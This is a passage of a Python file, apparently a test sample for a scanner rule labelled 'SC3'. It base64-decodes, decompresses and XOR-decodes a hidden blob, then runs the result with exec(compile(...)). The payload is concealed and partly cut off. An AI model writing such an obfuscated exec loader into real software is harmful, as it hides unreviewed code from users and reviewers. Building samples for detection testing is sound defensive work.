844TJZ59zfA+Htf/me8lMUETyKzed/SMHp1D+Q+/SvXGo0/Tf2dgvy5Q8iXk9xeWjzneI4CUbl98dvfByl7EKxX38AMVBddw=="
_K = bytes.fromhex("28883c5534301a581c553065")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
